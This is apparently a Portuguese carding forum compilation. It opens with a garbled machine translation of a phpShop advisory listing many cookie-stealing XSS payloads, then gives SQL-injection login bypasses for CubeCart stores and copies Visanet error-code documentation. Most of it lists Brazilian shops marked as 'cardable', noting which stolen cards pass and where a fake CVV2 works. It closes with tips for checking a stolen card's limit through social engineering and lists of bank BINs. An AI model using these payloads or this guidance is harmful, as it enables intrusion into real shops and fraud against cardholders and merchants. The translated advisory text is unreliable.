A informação inclui; Endereço Nome De Nickname, Companhia, Último Nome, Primeiro Nome, Nome Médio, Endereço, Cidade, Estado, Código De Fecho de correr, País, Telefone, Número De Fax. Isto não é obviamente bom e pode ser útil em ajudar a um atacante em outros ataques, tais como a engenharia social, e na enumeração da senha.
Para não o mencionar violação extremamente a privacidade do cliente.
Vulnerabilidade Da Injeção Do Certificado: Um atacante pode input o certificado ou o HTML malicioso em sua informação do transporte.
Isto será executado então por um administrador ou por um proprietário da loja ao ver a ordem dos atacantes. Pode ser usada por um atacante mandar um administrador realizar comandos ou executar unknowingly função administrativa.
Local Transversal Scripting: O local transversal Scripting no phpShop é apenas insano. Ocorre em quase e cada página.
Este não é um exaggeration tampouco infelizmente. Isto ocorre porque um número grande, if.not a maioria das variáveis que um usuário passa ao certificado através do método COMEÇAR é imprimida diretamente para selecionar usando o eco do php com NENHUM tipo de sanitizing em tudo. Além disso, alguma página que você tentar e visitar que você não manda o acesso à vontade permitir XSS porque TODA A variável você passa ao método começar será armazenada no formulário do início de uma sessão como um campo escondido. /?page=admin/index&GulfTech="><script>alert(document.cookie)</script > permitirá o local transversal Scripting, estranha bastante.
Como eu disse antes, XSS é possível apenas em aproximadamente cada página do phpShop, assim que eu não estou indo gastar as horas que fazem uma lista das centenas dos exemplos dos vulns de XSS, mas um punhado dos exemplos é fornecido abaixo. /?page=shop/browse&category_id="><script>alert(document.cookie)</script > /?func="><script>alert(document.cookie)</script > /?login="><script>alert(document.cookie)</script > /?page=account/shipto&user_info_id="><script>alert(document.cookie)</script > /?page=shopper/index&module_description="><script>alert(document.cookie)</script > /?page=shopper/menu&menu_label="><script>alert(document.cookie)</script > /?page=shopper/menu&shopper_list_mn="><script>alert(document.cookie)</script > /?page=shopper/menu&modulename="><script>alert(document.cookie)</script > /?page=shopper/menu&shopper_group_list_mnu="><script>alert(document.cookie)</script > /?page=shopper/menu&shopper_group_form_mnu="><script>alert(document.cookie)</script > /?page=vendor/index&module_description="><script>alert(document.cookie)</script > /?page=vendor/index&menu_label="><script>alert(document.cookie)</script > /?page=vendor/index&sess="><script>alert(document.cookie)</script > /?page=vendor/index&leftbar_title_bgcolor="><script>alert(document.cookie)</script > .
Para maiores Informações Recomendo a visita do site oficial do projeto Php-Shop
http://www.phpshop.org/
Serve mais para catar inter ta meio (**) de achar na verdade voce causa erros no banco de dados
com as strings 1 or 1=1-- se o cabra do admin nao acertou para nao aceitar caracteres babou
voce loga numa boa.
powered by CubeCart
e vejo os q tem store e troco o link por
/store/index.php?cat_id=1 or 1=1--
Codigos de erro da visanet - Sistema Verified By Visa
TID = Número único gerado a cada transação pela Visanet.
LR = Código de retorno da transação de captura
ARS = Mensagem da transação
Cap = Retorno do valor capturado (formato = Código Moeda, Valor Capturado, Casas Decimais). Ex.: Para o valor R$ 4,50 (quatro reais e cinqüenta centavos), será apresentado: 986,450,-2.
FREE = Campo de livre Digitação
Abaixo segue o descritivo do campo LR.:
0 = Capturado com sucesso;
1 = Autorização negada;
3 = Captura já efetuada.
Os erros mais comuns em uma captura são:
Cód. 108
- Tentar novamente - Falha de comunicação entre o WebServer e o servidor de POS da VISANET.
Cód.112
- Tid inexistente
- Tentativa de Captura excedeu o limite de 5 dias (dia da compra + 5)
- Gateway da Visanet fora de operação
LR = Código de retorno da transação de Cancelamento
Abaixo segue o descritivo do campo LR.:
0 = Cancelada com sucesso;
1 = Cancelamento negado;
3 = Cancelamento já efetuado.
Os erros mais comuns em um cancelamento são:
Cód. 108
- Tentar novamente - Falha de comunicação entre o WebServer e o servidor de POS da VISANET.
Cód.112
- Tid inexistente
- Tentativa de Cancelamento excedeu o limite 24 horas da Autorização.
- Gateway da Visanet fora de operação
Falha de Comunicação
Transação não autorizada
TIDMASTER = Número gerado na transação que apresentou erro. Ex.: 73489405115052541001.
Cancelamento da venda
TID = Número único gerado pela loja a cada transação. Ex.: 73489405115052541001
LR = Código de retorno da transação de Cancelamento
TID = Número único gerado a cada transação pela Visanet.
ARS = Mensagem da transação
FREE = Campo de livre Digitação
Abaixo segue o descritivo do campo LR.:
0 = Cancelada com sucesso;
1 = Cancelamento negado;
3 = Cancelamento já efetuado.
Os erros mais comuns em um cancelamento são:
Cód. 108
- Tentar novamente - Falha de comunicação entre o WebServer e o servidor de POS da VISANET.
Cód.112
- Tid inexistente
- Tentativa de Cancelamento excedeu o limite 24 horas da Autorização.
- Gateway da Visanet fora de operação
- Falha de Comunicação
Mais alguns erros
Etapa do Processo Tipo de operação Situações
Código Descrição
Loja - CBP Captura 215 TID não encontrado.
Loja - CBP Captura 213 TID não encontrado
Loja - CBP 1ª. Captura 112 Fora do prazo válido para primeira captura.
Loja - CBP Captura 227 Valor capturado acima do permitido.
Loja - CBP Demais capturas 225 Fora do prazo válido para capturas
Loja - CBP Demais capturas 226 Ultrapassou número total de capturas permitidas
Loja - CBP Captura 238 Tentativa de captura parcial de uma transação realizada com BIN estrangeiro.
Loja - CBP Demais capturas 239 Tentativa de realização da 2ª. captura sem que a primeira captura ainda não tenha sido realizada.
Loja - CBP Demais capturas 222 Tipo de transação capturada não compatível com transação original
Loja - CBP Demais capturas 233 Número do cartão da transação master inválido
Loja - CBP Demais capturas 234 Validade do cartão da transação master inválida
Loja - CBP Demais capturas 236 Valor para captura parcial inválido
Etapa do Processo Tipo de operação Situações
Código Descrição
Loja - CBP Re-submissão 215 TID não encontrado
Loja - CBP Re-submissão 213 TID não encontrado
Loja - CBP Re-submissão 218 Fora do prazo válido para re-submissões
Loja - CBP Re-submissão 235 Ultrapassou o número total de re-submissões permitidas
Loja - CBP Re-submissão 237 Não é permitido re-submeter uma transação com esse código de negada.
Loja - CBP Re-submissão 222 Não é permitido re-submeter este tipo de transação (Electron ou Visa Vale).
Loja - CBP Re-submissão 219 Tentativa de re-submissão de uma transação realizada com BIN estrangeiro.
Loja - CBP Re-submissão 223 Tipo de transação re-submetida não compatível com a transação original
Loja - CBP Re-submissão 217 Não encontrou dados financeiros na transação master.
Loja - CBP Re-submissão 220 Transação master é uma transação re-submetida. Não permite re-submissão
Loja - CBP Re-submissão 233 Transação master é uma transação re-submetida. Não permite re-submissão
Loja - CBP Re-submissão 234 Validade do cartão da transação master inválida
Etapa do Processo Tipo de operação Situações
Código Descrição
CBP - MPI Venda 191 Falha de comunicação durante o processo de autenticação (MPI).
CBP - MPI Venda 192 Falha de comunicação durante o processo de autenticação (MPI).
Etapa do Processo Tipo de operação Situações
Código Descrição
CBP - Banco Venda 100 Falha de comunicação entre Visanet e banco durante o processo de autenticação.
CBP - Banco Venda 110 Falha de comunicação entre Visanet e banco durante o processo de autenticação.
CBP - Banco Venda 120 Falha de comunicação entre Visanet e banco durante o processo de autenticação.
Etapa do Processo Tipo de operação Situações
Código Descrição
CBP - Banco Venda 130 Falha de comunicação entre Visanet e banco durante o processo de autenticação.
CBP - Banco Venda 140 Falha de comunicação entre Visanet e banco durante o processo de autenticação.
CBP - Banco Venda 160 Falha de comunicação entre Visanet e banco durante o processo de autenticação.
Etapa do Processo Tipo de operação Situações
Código Descrição
CBP - Banco Venda 170 Transação não autorizada. Opção loja.
(Não é possível re-submeter esta transação).
CBP - Banco Venda 150 Falha de comunicação entre Visanet e banco durante o processo de autenticação.
CBP - Banco Venda 180 Falha de comunicação entre Visanet e banco durante o processo de autenticação
Etapa do Processo Tipo de operação Situações
Código Descrição
CBP - Host Todas 98 Visanet indisponível para processar a transação no momento.
CBP - Host Venda 00 Transação autorizada.
CBP - Host Venda 01 Transação negada. (Não é possível re-submeter esta transação).
CBP - Host Venda 02 Transação negada. Referida.
(Não é possível re-submeter esta transação).
CBP - Host Venda 03 Transação negada. Estabelecimento inválido.
(Não é possível re-submeter esta transação).
CBP - Host Venda 04 Transação negada.(Não é possível re-submeter esta transação).
CBP - Host Venda 06 Problemas ocorridos na transação eletrônica.
CBP - Host Venda 07 Transação negada. (Não é possível re-submeter esta transação).
CBP - Host Venda 11 Transação autorizada.
CBP - Host Venda 15 Emissor sem comunicação.
CBP - Host Venda 19 Refaça a transação
CBP - Host Venda 21 Transação não localizada..
CBP - Host Venda 22 Parcelamento inválido.
CBP - Host Venda 25 Número do cartão não foi enviado.
CBP - Host Venda 28 Arquivo indisponível.
CBP - Host Venda 41 Transação negada.
CBP - Host Venda 52 Cartão com dígito de controle inválido.
CBP - Host Venda 53 Cartão inválido para essa operação
CBP - Host Venda 54 Transação negada. Cartão vencido.
CBP - Host Venda 62 Transação negada.
CBP - Host Venda 63 Transação negada.
CBP - Host Venda 65 Transação negada.
CBP - Host Venda 75 Transação negada.
CBP - Host Venda 76 Problemas com número de referência da transação.
CBP - Host Venda 77 Dados não conferem com mensagem original.
CBP - Host Venda 80 Data inválida.
CBP - Host Venda 81 Erro de criptografia.
CBP - Host Venda 82 Transação negada.
CBP - Host Venda 83 Erro no sistema de senhas.
CBP - Host Venda 85 Erro métodos de criptografia.
CBP - Host Venda 86 Refaça a transação.
CBP - Host Venda 91 Emissor sem comunicação.
CBP - Host Venda 93 Transação negada.
CBP - Host Venda 94 Transação negada. (Não é possível re-submeter).
CBP - Host Venda 96 Falha no sistema.
CBP - Host Venda 98 Emissor sem comunicação.
CBP - Host Venda 99 Emissor sem comunicação. SITEF.
CBP - Host Venda 08 Transação negada.(Não é possível re-submeter).
CBP - Host 1ª. captura 00 Primeira captura realizada com sucesso
CBP - Host 1ª. captura 01 Não foi possível realizar a primeira captura.
CBP - Host Captura 00 Transação autorizada.
CBP - Host Captura 01 Transação negada. Referida.
CBP - Host Captura 02 Transação negada. Referida.
CBP - Host Captura 03 Transação negada. Estabelecimento inválido.
CBP - Host Captura 04 Transação negada.
CBP - Host Captura 05 Transação negada.
CBP - Host Captura 06 Problemas ocorridos na transação eletrônica.
CBP - Host Captura 07 Transação negada.
CBP - Host Captura 11 Transação autorizada.
CBP - Host Captura 12 Transação inválida.
CBP - Host Captura 13 Valor inválido
CBP - Host Captura 14 Cartão inválido
CBP - Host Captura 15 Emissor sem comunicação.
CBP - Host Captura 19 Refaça a transação
CBP - Host Captura 21 Transação não localizada.
CBP - Host Captura 22 Parcelamento inválido
CBP - Host Captura 25 Número do cartão não foi enviado.
CBP - Host Captura 28 Arquivo indisponível.
CBP - Host Captura 41 Transação negada.
CBP - Host Captura 43 Transação negada.
CBP - Host Captura 51 Transação negada.
CBP - Host Captura 52 Cartão com dígito de controle inválido.
CBP - Host Captura 53 Cartão inválido para essa operação.
CBP - Host Captura 54 Transação negada. Cartão vencido.
CBP - Host Captura 55 Transação negada. Senha inválida.
CBP - Host Captura 57 Transação não permitida.
CBP - Host Captura 61 Transação negada.
CBP - Host Captura 62 Transação negada.
CBP - Host Captura 63 Transação negada.
CBP - Host Captura 65 Transação negada.
CBP - Host Captura 75 Transação negada.
CBP - Host Captura 76 Problemas com número de referência da transação.
CBP - Host Captura 77 Dados não conferem com mensagem original.
CBP - Host Captura 80 Data inválida.
CBP - Host Captura 81 Erro de criptografia.
CBP - Host Captura 82 Transação negada.
CBP - Host Captura 83 Erro no sistema de senhas.
CBP - Host Captura 85 Erro métodos de criptografia.
CBP - Host Captura 86 Refaça a transação.
CBP - Host Captura 91 Emissor sem comunicação..
CBP - Host Captura 93 Transação negada.
CBP - Host Captura 94 Transação negada.
CBP - Host Captura 96 Falha no sistema.
CBP - Host Captura 98 Emissor sem comunicação.
CBP - Host Captura 99 Emissor sem comunicação. SITEF.
Como funciona uma transação com cartão Visa (Verify-by-Visa)
1 - O cliente escolhe como forma de pagamento cartão Visa ou VisaElectron.
2 - Um conjunto de programas ( Dll’s e Exe ) instalados na loja criptografa os dados da compra
(Cesta de compras) e envia para o servidor de pagamentos da Visanet.
3 - O Servidor de pagamentos recebe os dados da compra e se a chave de criptografia estiver
correta, abrirá uma nova janela onde o portador irá digitar o BIN (6 primeiros Dígitos) do seu
cartão VISA.
4 - Após a Visanet identificar que o BIN do cartão está participando do processo VbV ele será
direcionado para a tela de autenticação do Banco emissor, caso o BIN não participe ele devera
digitar o restante do n.º cartão seguido do código de segurança (cvv2).
5 - O Sistema da Visanet ira passar a sessão do browser (navegador) ao banco emissor.
6 - O Emissor irá solicitar uma identificação do portador.
7 - O Portador vai se identificar na tela do banco emissor.
8 - O banco emissor vai passar para a Visanet a sessão do Browser junto com o cartão escolhido
pele portador e a sua validade.
9 - A Visanet iniciará o processo de autorização da Cesta de compras, junto ao servidor de POS.
10 – 0 Servidor de POS irá acionar o Sitef que irá formatar a mensagem de acordo com o padrão
internacional de transações de cartões de crédito.
11 - O Sitef enviará os dados da transação para os sistemas de autorização da Visa que ira
acionar o emissor do cartão.
12 - O emissor responderá com um código, determinando se a transação foi autorizada ou negada.
(Conforme tabela na pág. 25).
13 - O Sitef devolve o código ao servidor de POS.
14 - O servidor de POS devolverá o código de resposta do emissor juntamente com o "TID"
(Transaction ID), para o Servidor de pagamentos
15 - O Servidor de pagamentos devolvera para a servidor da loja os dados da transação, para que
seja feita uma captura (confirmação) posteriormente.
16 - A loja envia ao cliente uma página de resposta (aprovado ou negado).
Index.asp: Apresentação da Loja de exemplo e das etapas da loja até a realização de uma transação.
Pagina01.asp: Página para a compra de um produto.
Pagina02.asp : Esta página capta os dados do cliente para criar o campo order.
Pagina03.asp: Nesta página, o cliente escolhe o meio de pagamento “Cartão Visa”.
Pagina04.asp: Nesta página, o cliente deverá escolher e o prazo de pagamento, se é a vista ou parcelado lojista ou parcelado emissor do cartão.
Pagina05.asp: Esta página capta todos os dados da compra e aciona o componente que irá se comunicar com a Visanet.
Pagina06.asp: Esta página recebe os dados da transação se ela foi aprovada ou Negada.
Captura.html: Esta página efetua a Captura (confirmação) da compra.
Statuscaptura.asp: Esta pagina recebe os dados da captura da compra.
Cancel.html: Esta página efetua o Cancelamento da compra.
StatusCancel.asp: Esta pagina recebe os dados do cancelamento da compra.
Ressubmissão.asp: Esta pagina reenvia as transações que não foram autorizadas conforme tabela de erros.
StatusRessubmissão.asp: Esta pagina recebe os dados da Re-submissão da compra.
CaptureBalance.asp: Esta pagina você pode efetuar capturas parciais de uma compra.
Statuscapturebalance.asp: Esta pagina recebe os dados das capturas parciais.
Link´s:
Sites Cardables
INFORMÁTICA
www.kabum.com.br - Informatica
www.lojavirtual.angrasys.com.br - Informática
www.kalunga.com.br - Informática
www.todays.com.br - Informática (vo testa)
www.goldline.com.br - Informática
www.rbcom.com.br - Informática
www.intrabox.com.br - Informática (vo testa)
www.imagemrio.com.br - Informática
www.eashop.com.br - Jogos de computador
www.itautecshop.com.br - Informática
www.katalogo.com.br - Itilitarios/Jogos
www.nwi.com.br - Informática
www.superkit.com.br - Informática (vo testa)
www.trendshop.com.br - Informática / Eletrônico / Só serão aceitos BR
www.updatesystems.com.br - Informática
www.lrshop.com.br/ - Informática
https://ssl88.locaweb.com.br/comput...v3/detalhes.asp - cc br full /Visa ou Master
www.amx.com.br/GWSExpress/ - Informática
www.amx.com.br/pontobr/ - Informática
www.amx.com.br/shopdamidia/ . Informática
www.jet.com.br/starcomputer/ - Informática
www.jet.com.br/evertek/ - Informática
www.ecenter.com.br/acesso/ - Informática
www.ecenter.com.br/elyte/ - Informática
www.ecenter.com.br/fbl/ - Informática
www.tomorrow.com.br - Informática
www.inforgates.com.br - Informática
www.unisys.com.br - Informática
www.strcomp.com.br - Informática
www.farahs.com.br - Informática
www.2sinfo.com.br/capa.asp - Informática
www.3dsystem.com.br - Informática
www.softwayinformatica.hpg.ig.com.br - Informática
www.pluguse.com.br - Informatica
www.menainformatica.com.br - Informática
www.laptopexchange.com - Informática
www.4you.com.br - Informática
www.digimer.com.br - Informática
www.rbcom.com.br - Informática
www.jet.com.br/evertek/ - Informática Eletrônicos
www.fnac.com.br - Livros e Artigos Informática
www.axcelbooks.com.br - Livros Informática
www.livros.com.br/alvo.asp - Livros Informática
www.temporeal.com.br - Livros Informática
www.livrosdeinformatica.com.br - Livros Informática
www.tecnomidia.com.br - Cds Virgens
http://loja2001.telepac.pt/ - Modem Adsl
www.kitrecarga.bpg.com.br/new /produtos - Cartuchos
www.laptopshop.com.br - Notebooks
www.optikal.com.br - Hardware
www.mouses.com.br / Mouses/ (Tudo Pra sua Lan House) Aceita apenas visa !
www.infobox.com.br - Mastercard/dinners/visa - cds de informatica
www.wisenetwork.com.br/default.asp Informatica
www.macfix.com
www.intersol.com.br - Informática / Visa / Amex / Mastercard (Credicard).
www.a1nettrading.com.megaloja.com - Eletrônico/Informática | Aceita CC Inter
Eletrônicos
www.eletrocity.com - Master / Dinners / Visa full , se não for full irá pedir documentos !
www.ishop21.com.br -
www.etronics.com.br - Amex / Master / Visa / Dinners, Sistema Redecard,visa net ...
www.colombo.com.br - Aceitam Visa / Mastercard / Diners / Amex
www.qualivillas.com.br
www.ogbshop.com.br - Visa BR full
www.vilson.com.br - Eletronicos
www.bannana.com.br - Visa Br Full
www.najashop.com -
www.bitscompras.com.br - Aceitam Visa / Mastercard / Diners / Amex
www.eletronicstore.com.br -Visa / Master / Amex
www.ambientair.com.br - Eletrônicos
www.lojavilson.com.br - Eletrônicos
www.dshop.com.br - Eletrônicos
www.polishop.com.br - Eletrônicos
www.pluguse.com.br - Eletrônicos
www.tecnomania.com.br - Eletrônicos
www.dishop.com.br - Eletrônicos
http://compras.importexpress.com.br - Eletrônicos
www.manlec.com.br - Eletrônicos
www.eletrocity.com.br - Eletrônicos
www.eletronicstore.com.br/index.asp - Eletrônicos
www.lojaclick.com.br - Eletrônicos
www.casionet.com.br - Eletrônicos
www.lojasarno.com.br/ - Eletrônicos
www.novomundo.com.br - Eletrônicos
www.efacil.com.br - Eletrônicos
www.samsung.com.br/ - Eletrônicos
www.ibmega.com - Eletrônicos
www.brasilshop.com.br - Eletrônicos
www.lacer.com.br - Eletrônicos
www.comprafacil.com.br - Eletrônicos
www.olivetti.com.br/ - Eletrônicos
www.jet.com.br/juaosom/ - Eletrônicos
www.bernasconi.com.br - Eletrônicos
www.directstore.com.br/loja/loja.asp ?COD_LOJA= - Eletrônicos LG
www.dvdnow.com.br - Eletrônicos DVD
www.jet.com.br/fastcolor/ - Máquinas Fotográficas e Digitais
www.beephoto.com.br - Artigos Fotográficos
www.focusfilme.com.br - Máquinas Fotográficas
www.fotoptica.com.br - Máquinas Fotográficas
www.videosonic.com.br - Filmadoras / Aceitam Visa / Mastercard / Diners / Amex
www.panashop.com.br - Áudio Vídeo
www.bside.com.br - Artigos Discoteca
www.showpoint.com.br/ - Luzes Discoteca
www.videosonic.com.br - Som Discoteca
www.videokestore.com.br - Artigos Videoke
www.showpoint.com.br - Áudio Instrumentos Musicais
Celulares
http://shopping.motorola.com.br - Celulares
www.vivo.com.br- Celulares
www.atl.com.br - Celulares(Claro)
www.amx.com.br/celulares - Celulares
www.mdxtelecom.com.br - Celulares
Esportes
www.mundodofutebol.com - Artigos Esportivos / CC BR APENAS
www.timesetorcidas.com.br - Artigos Esportivos | Compras Internacionais não poderão ser parceladas.
www.futebolshopping.com.br - Artigos Esportivos
www.roxosedoentes.com.br - Artigos Esportivos
www.bylu.com.br - Roupas Esportivas
www.ginastic.com.br - Artigos Ginástica Lazer
www.caloi.com.br - Bicicletas
www.extremefight.com.br - Artigos Jiu-Jitsu
www.sncshop.com - Suplementos
www.rumo.com.br/ciadasvitaminas - Suplementos
www.brasilnutrition.com.br - Suplementos
www.corpoperfeito.com.br - Suplementos
www.performancesportiva.com.br - Suplementos - br,moset sedex se passar de 300 desconfiam e pedem docs
www.creatina.com.br - Creatina / Visa / Amex / Master / Dinners
Roupas
www.marisa.com.br - cc br full,pode colocar cvv2 falso,entrega por sedex até 2 dias pra confirmarem
www.timberland.com.br - Calçados
www.taco.com.br - Roupas
www.tuttobianco.com.br - Roupas
www.viadireta.com.br - Roupas
www.brunominelli.com.br - Roupas
www.boardshop.com.br - Roupas
www.adji.com.br - Roupas
www.divestation.com.br - Roupas Mergulho e Rollers
www.cuecasonline.com.br - Cuecas
www.proshoptenis.com.br - Artigos para Tênnis
Papelaria Livros/Cds/Dvds/Games/Música
www.papelariareal.com.br - Papelaria
www.videotecapremiere.com.br - Dvds Games
www.pacificmusic.com.br - Cds e Dvd
www.2001video.com.br - Vídeos DVD
www.arenadvd.com.br - DVD
www.cdpoint.com.br - CDS DVDS
www.dvdinternet.com.br - DVDS
www.dvdworld.com.br - DVDS
www.videonorte.com.br - Cds Dvds
www.lojasupergames.com.br - Aparelhos e Jogos Games
www.joystick.com.br - Joystick Micro
www.diskgames.com.br - Gam
www.imusica.com.br / Compre músicas online / Mastercard / Dinners
Perfumes
www.aperfumista.com.br - Perfumes
www.perfumaria.com.br - Perfumes
www.perfumes.com.br - Perfumes
www.perfumesfamosos.com.br - Perfumes
www.redemarket.com.br - Perfumes
www.mundialperfumes.com.br - Perfumes
www.aguadecheiro.com.br - Perfumes
www.sacks.com.br - Perfumes Maquiagem
www.lacquadifiori.com.br - Perfumes
www.novoestilo.com.br - Perfumes/óculos/Canetas
www.avon.com.br - cc Full,moset, ta (**) passar lá !
www.kapella.com.br/site - Master/Dinners cc inter
Jóias
www.joiasja.com.br - Jóias
www.joalheria.net - Jóias
Relógios
www.toptime.com.br - Relógios
www.clocksite.com.br - Relógios
www.victorinoxnet.com.br - Relógios/Canivetes
Flores
www.abigailcestas.com.br - Cestas e Flores
www.floresonline.com.br - Cestas e Flores
www.lembreidevoce.com.br - Flores e Presentes
www.patrocinio.com.br - Flores
www.giulianaflores.com.br - Flores
www.uniflores.com.br - Flores
www.florasavassi.com.br - Flores
Móveis
www.clickcasa.com.br - Móveis Decoração
www.lojadolar.com - Móveis
www.mmartan.com.br - Cama/Mesa e Banho
www.lojaskd.com.br - Móveis
www.zelo.com.br . Cama/Mesa e Banho
www.lojaskd.com.br - Visa/Master/Dinners - não pede fatura ate 600 e so cc br full
Trasportes
www.rodao.com.br/ - Rodas Carro
www.amx.com.br/sanautica/ - Barcos
www.motostore.com.br - Peças de Motos
www.rumo.com.br/amomeucarro - Peças de Carro
Comidas/Saúde_test
www.pizzahutsp.com.br - Pizza
www.winehouse.com.br - Vinho
www.docepecado.com.br - Chocolates
www.rumo.com.br/doces - Doces/Chocolates
www.fec.com.br - Farmácia
www.panvel.com.br - Farmácia
www.saudestore.com.br - Artigos Saude
www.drogasmil.com.br
Brinquedos
www.brincando.com.br - Brinquedos
www.rihappy.com.br - Apenas cc BR = Visa / Mastercard / Dinners / Amex
www.1000teddybears.com - Todos cartões de crédito.
www.burago.com.br - Miniaturas de Carros / Visa / Dinners / Amex / Master
www.rumo.com.br/kfc - Berços e coisas Crianças
www.toymania.com.br - Moset / só cc br full
Ingressos/Passagens
www.ingressofacil.com.br - Ingressos
www.ticketmaster.com.br - Ingressos
www.voegol.com.br - Passagens Aéreas
www.decolar.com.br - Passagens Aéreas
Geral
www.ironman.com.br - Geral
www.jet.com.br/nakamura - Geral
www.pontofrio.com.br - Geral
www.shoptime.com - Geral / br full, nunca do sorte =\ sedex até 4 dias pra confirmarem
www.extra.com.br - Geral / br full se não irá pedir documentos ,1 dia para passar
www.magazineluiza.com.br - Geral
www.casaevideo.com.br - Geral
www.fastshop.com.br - Geral
www.polishop.com.br - cc inter e br, site moset.
www.stts.com.br - Geral
www.brasifshopping.com.br - Geral
www.siciliano.com.br - cc inter e br,sendo o primeiro muito dificilde aprovarem, pode colocar cvv2 falso,entrega por sedex até 2 dias pra confirmarem
Domínios
www.register.com
www.winsave.com
www.locaweb.com.br
www.gsweb.com.br- Hospedagem
Outros
www.iberiaespadas.com.br - Espadas
www.terranossa.com.br . Enfeites
www.zipposhop.com.br - Isqueiros
www.rumo.com.br/adultmall - Cds Pornográficos
www.rumo.com.br/escritorioecia - Artigos Escritório
www.rumo.com.br/pepemodelismo - Modelismo
www.sfhobbies.com.br - Modelismo
www.vivacce.com.br - Bolsas e Malas
www.gazin.com.br - Eletrodomésticos
www.kilar.dock.com.br - Eletrodomésticos
www.realmarine.com.br - Artigos para Navegação
www.lojadolar.com - Artigos Cozinha
www.dragonetti.com.br - Utilitários de cozinha
www.spy.com.br - Rayban SPY
www.arcoeflecha.com.br - Artigos Acampamento
www.zionoutdoor.com.br - Artigos Acampamento
www.martinelli.com.br - Camping em Geral
www.armas.com.br - Armas de Fogo
www.hsternhome.com.br - Cristais
www.bettega.com.br - Cristais Porcelanas
www.sexxyshop.com.br - Compre seus Vibradores
Saber o limite do Cartao
Para você ter certeza que seu pedido irá passar você precisa saber pelo menos o limite do cc né?
Bem infelizmente para nossa tristeza alguns bancos na hora que liga para saber o saldo eles pedem um monte de coisas antes
e neste caso e mais dificil.
Bem mais como vou saber qual o banco emissor do cartao:
4128 7541 3218 0366
/ |
| |__ esses três números correspondem ao banco emissor do CC
|______ aqui a operadora do CC
|
|_ 3 = American Express
|_ 4 = Visa
|_ 5 = MasterCard
|_ 6 = Discover
Bem entao vamos la voce vai ter que ligar para o telefone do banco para atendimento eletronico e muitas das vezes e
uma gravacao melhor ainda e mais tranquilo. Bem sendo a gravacao voce somente tera que apertar as teclas informadas.
Depois de apertar as opcoes você vai ouvir o saldo atual, limite e quanto você ainda vai poder gastar que beleza heim.
Para os bancos que não é atendimento eletronico,você ira precisar usar toda sua engenharia social.
Uma Forma bem rapida e voce ligar para VisaNet e eles informarao o banco e o 0800 do banco.
0800788472 => visa
0800784411 => master
Se voce quer testar o seu cartao podera testar no site www.uol.com.br www.globo.com e tem outros e so ir na secao
assinatura preencher os dados pedidos pois os sites sao moset e testao o cartao na hora.
----------------------------------------------------------------------
Tabela de limites dos cartoes
Ourocard Visa 2 DATAS minimo 8.000,00 maximo 30.000,00
Ourocard Visa/MasterCard minimo 2.000,00 maximo 12.000,00
Visa Facil c/ limite zero maximo 1.000,00
MasterCard c/ limite zero maximo 1.000,00
Visa Facil maximo 3.000,00
MasterCard maximo 3.000,00
Ourocard Visa/MasterCard maximo 50.000,00
Ourocard 2 Datas maximo 60.000,00
----------------------------------------------------------------------
Bradesco
Master Card
548045
548046
548293
549159
552530
552531
554298
554299
555040
558285
558294
544838
Visa
411801
430951
430952
426372
426373
426374
423942
423700
411802
411804
449137
456508
433470
433471
433472
433473
438000
438001
438002
438003
438004
438005
438006
438007
438008
438009
438010
438011
438012
438013
438014
438015
438016
438017
438018
438019
438020
438021
438022
438023
438024
438025
438026
438027
438028
438029
438030
438031
438032
438033
438034
438035
438036
438037
438038
438039
449138
448543
451135
450857
451476
4380
4096
4011
4118
4931
4532
4551
4532 gold
4565
4066 - prime
4056 - PLATINUM IN VERITAS
492052
Itau
Master Card
5493
5390
5364
539059
544859
546452
518491
549359
536358
536358
536367
552072 Personnalite
536371
536377
536380
536381
536382
536391
536452
536458
536467
536471
_________________